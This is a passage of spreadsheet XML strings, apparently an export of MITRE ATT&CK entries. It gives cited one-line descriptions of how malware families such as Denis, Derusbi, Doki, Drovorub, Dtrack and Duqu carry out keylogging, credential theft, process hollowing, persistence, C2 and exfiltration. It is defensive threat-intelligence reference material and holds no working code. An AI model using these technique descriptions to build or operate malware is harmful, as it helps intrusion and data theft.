    <t>[Daserf](https://attack.mitre.org/software/S0187) can log keystrokes.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) leverages [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to steal credentials.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can take screenshots.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>A version of [Daserf](https://attack.mitre.org/software/S0187) uses the MPRESS packer.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses custom base64 encoding to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can use steganography to hide malicious code downloaded to the victim.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses RC4 encryption to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can execute shell commands.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) leverages vulnerable versions of Flash to perform execution.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) compressed collected data using zlib.(Citation: Securelist Denis April 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) exploits a security vulnerability to load a fake DLL and execute its code.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) will decrypt important strings used for C&amp;C communication.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a command to delete files from the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has several commands to search directories for files.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) deploys additional backdoors and hacking tools to the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) used the &lt;code&gt;IsDebuggerPresent&lt;/code&gt;, &lt;code&gt;OutputDebugString&lt;/code&gt;, and &lt;code&gt;SetLastError&lt;/code&gt; APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used &lt;code&gt;GetProcAddress&lt;/code&gt; and &lt;code&gt;LoadLibrary&lt;/code&gt; to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the &lt;code&gt;Wow64SetThreadContext&lt;/code&gt; API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) obfuscates its code and encrypts the API names. [Denis](https://attack.mitre.org/software/S0354) also encodes its payload in Base64.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) queries the Registry for keys and values.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) encodes the data sent to the server in Base64.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) collects OS information and the computer name from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) uses &lt;code&gt;ipconfig&lt;/code&gt; to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) can launch a remote shell to execute arbitrary commands on the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing audio captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) injects itself into the secure shell (SSH) process.(Citation: Airbus Derusbi 2015)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) uses a backup communication method with an HTTP beacon.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of obtaining directory, file, and drive listings.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of logging keystrokes.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) binds to a raw socket on a random source port between 31800 and 31900 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) has used unencrypted HTTP on port 443 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) collects current and parent process IDs.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of enumerating Registry keys and values.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.(Citation: ThreatGeek Derusbi Converge)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing screen captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) obfuscates C2 traffic with variable 4-byte XOR keys.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>A Linux version of [Derusbi](https://attack.mitre.org/software/S0021) checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. [Derusbi](https://attack.mitre.org/software/S0021) also gathers the username of the victim.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>The [Derusbi](https://attack.mitre.org/software/S0021) malware supports timestomping.(Citation: Novetta-Axiom)(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of capturing video.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can download remote files.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encodes C2 traffic with base64.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encrypts C2 data with AES256 in ECB mode.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can spawn remote shells.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [Dipsind](https://attack.mitre.org/software/S0200) variant registers as a Winlogon Event Notify DLL to establish persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in man-in-the-middle actions.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) downloads and installs Tor via homebrew.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>Plist Modification</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) persists via a plist login item.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the embedTLS library for network communications.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was run through a deployed container.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600)’s container was configured to bind the host root directory.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used Ngrok to establish C2 and exfiltrate data.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was executed through an open Docker daemon API port.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has resolved the path of a process PID to use as a script argument.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has downloaded scripts from C2.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has disguised a file as a Linux kernel module.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has searched for the current process’s PID.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has executed shell scripts with /bin/sh.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the dogechain.info API to generate a C2 address.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell for execution.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) searches and reads the value of the Windows Update Registry Run key.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell to add a Registry Run key in order to establish persistence.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim host name and serial number, and then sends the information to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim username and sends it to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses the command line.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>After downloading its main config file, [Downdelph](https://attack.mitre.org/software/S0134) downloads multiple payloads from C2 servers.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses RC4 to encrypt C2 responses.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RSA.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a module for VNC.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RC4.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has used HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can unarchive data downloaded from the C2 to obtain the payload and persistence modules.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has used legitimate web services to exfiltrate data.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can collect the names of all files and folders in the Program Files directories.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can download and execute additional files.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can execute arbitrary shell commands on the victims' machines.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can download files to a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>Kernel Modules and Extensions</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) packs collected data into a password protected archive.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s RAT makes a persistent target file with auto execution on the host start.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can retrieve browser history.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect a variety of information from victim machines.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a decryption routine that is part of an executable physical patch.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can remove its persistence and delete itself.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can list files on available disk volumes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can replace the normal flow of a program execution with malicious code.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s can download and upload a file to the victim’s computer.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper contains a keylogging executable.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can save collected data to disk, different file formats, and network shares.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a dropper that embeds an encrypted payload as extra data.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper can list all running processes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used process hollowing shellcode to target a predefined list of processes from &lt;code&gt;%SYSTEM32%&lt;/code&gt;.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) contains a function that calls &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt;.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the victim's computer name, hostname and adapter information to create a unique identifier.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the host's IP addresses using the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect network and active connection information.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) used hard-coded credentials to gain access to a network share.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used &lt;code&gt;cmd.exe&lt;/code&gt; to add a persistent service.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can add a service called WBService to establish persistence.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on open windows.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can track key presses with a keylogger module.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on accounts and permissions.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) has used &lt;code&gt;msiexec&lt;/code&gt; to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on process details.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is capable of loading executable code via process hollowing.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>When the [Duqu](https://attack.mitre.org/software/S0038) command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The [Duqu](https://attack.mitre.org/software/S0038) command and control protocol's data stream can be encrypted with AES-CBC.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The reconnaissance modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network configuration.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network connections.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) contains a keylogger.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for network drives and removable media and duplicates itself onto them.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses a function to obfuscate the name of functions and other parts of the malware.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: DustySky)</t>
  </si>
  <si>
